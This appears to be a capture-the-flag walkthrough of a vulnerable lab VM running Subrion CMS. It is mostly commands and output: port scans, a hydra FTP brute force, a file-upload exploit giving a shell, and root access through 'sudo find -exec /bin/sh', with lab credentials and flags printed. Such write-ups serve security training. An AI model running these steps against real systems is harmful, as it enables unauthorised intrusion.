nmap -sP
# Host: 10.80.56.101   Target: 10.80.56.170

# Scan for detailed port information. Most ports are closed, which is fine: it narrows down the possible approaches
nmap -A -n -p 1-65535 10.80.56.170
PORT     STATE  SERVICE    VERSION
21/tcp   open   ftp        vsftpd 3.0.3
22/tcp   closed ssh
80/tcp   open   http       Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
443/tcp  open   http       Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
7070/tcp closed realserver
8084/tcp closed websnp
MAC Address: 08:00:27:10:E2:AE (Oracle VirtualBox virtual NIC)

# Nothing useful here
nmap -sS -sV -A -n 10.80.56.170

# Scan the website directories
dirsearch -u https://10.80.56.170/

# A comment on the home page contains what looks like an MD5 hash; an online lookup site cracked it, giving a string that looks like a username
<!--
Modified from the Debian original for Ubuntu
Last updated: 2016-11-16
See: https://launchpad.net/bugs/
-->
<!...<5f2a66f947fa5690c26506f66bde5c23> follow this to get access on somewhere.....-->
hostinger

# Try FTP; it asks for a password
ftp 10.80.56.170

# Try brute forcing; it ran for a long time, so change approach
hydra -l hostinger -P /usr/share/wordlists/rockyou.txt 10.80.56.170 ftp

# Guessed that the password might be the same string; tried it and it worked
FTP user: hostinger
Password: hostinger

# Get the hint
get hint.txt
cat hint.txt
Hey there...
T0D0 --
# The first sentence contains two encoded strings
* You need to follow the 'hostinger' on WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= also aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=
* some knowledge of cipher is required to decode the dora password..
* try on venom.box
password -- L7f9l8@J#p%Ue+Q1234 -> deocode this you will get the administrator password

# Decode with CyberChef "Magic": https://cryptii.com/pipes/vigenere-cipher
aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=

# Decode with CyberChef "Magic": standard vigenere cipher
WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0=

# Resulting information: go to the decoding site and decrypt with the standard Vigenère cipher, using hostinger as the key.
* You need to follow the 'hostinger' on standard vigenere cipher also https://cryptii.com/pipes/vigenere-cipher
* some knowledge of cipher is required to decode the dora password..
# Edit hosts to add name resolution for venom.box
* try on venom.box
Have fun .. :)

# Resulting credentials
User: dora
Password: E7r9t8@Q#h%Hy+M1234

# Open the site; login succeeds and gives access to the admin panel
venom.box

# Web root directory
/var/www/html/subrion

# Look up the framework; usable vulnerabilities are found
searchsploit Subrion CMS 4.2.1
------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                    |  Path
------------------------------------------------------------------ ---------------------------------
Subrion CMS 4.2.1 - 'avatar[path]' XSS                            | php/webapps/49346.txt
Subrion CMS 4.2.1 - Arbitrary File Upload                         | php/webapps/49876.py
Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)  | php/webapps/50737.txt
Subrion CMS 4.2.1 - Cross-Site Scripting                          | php/webapps/45150.txt
Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)

# Fetch the file upload script
searchsploit -m 49876.py

# Upload succeeds; shell obtained
python 49876.py -u http://venom.box/panel -l dora -p E7r9t8@Q#h%Hy+M1234

# Could not upgrade to an interactive shell, but the site's file upload is known to serve phar files, so uploaded a reverse shell script; the upgrade to an interactive shell then succeeded
python -c "import pty;pty.spawn('/bin/bash')"

# Get the hostinger password
cat .backup.txt
User_access
user: hostinger
password: hostinger

# Found a flag
cat robots.txt
User-agent: *
F1nd_Y0ur_way_t0_g3t1n.txt

# Found a password in the backups directory; tried the known ciphers without success, so it is probably plaintext
cat .htaccess
allow from all
You_will_be_happy_now :)
FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a

# Switch user
su hostinger

# Looked at .bash_history: the check_me.py file is puzzling, and the history shows frequent switches to the nathan user
find raj -exec "whoami" \;
cat check_me.py

# Switch user, using the password found above
su nathan

# Get the second flag
cat user.txt
W3_@r3_V3n0m:P

# The user turns out to be able to run commands as root
-rw-r--r-- 1 nathan nathan 0 May 20 2021 .sudo_as_admin_successful

# Tried sudo su directly; it fails
sudo -l
[sudo] password for nathan: FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a
Matching Defaults entries for nathan on venom:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nathan may run the following commands on venom:
    (root) ALL, !/bin/su
    (root) ALL, !/bin/su
sudo su

# check_me.py shows up again
chmod +s check_me.py
ls -al
python check_me.py
nano check_me.py
python check_me.py
chmod 740 check_me.py

# This user is allowed to run find; searched for the flag file and for check_me.py, but found nothing
find / -name 'F1nd_Y0ur_way_t0_g3t1n.txt'

# Search for files with the 4000 (SUID) permission bit; find is among them
find / -user root -perm -4000 -print 2>/dev/null
/opt/VBoxGuestAdditions-6.1.20/bin/VBoxDRMClient
/usr/bin/find

# Escalate privileges with find; success
sudo find . -exec /bin/sh \; -quit

# Get the last flag; box completed
cat root.txt
#root_flag
H@v3_a_n1c3_l1fe.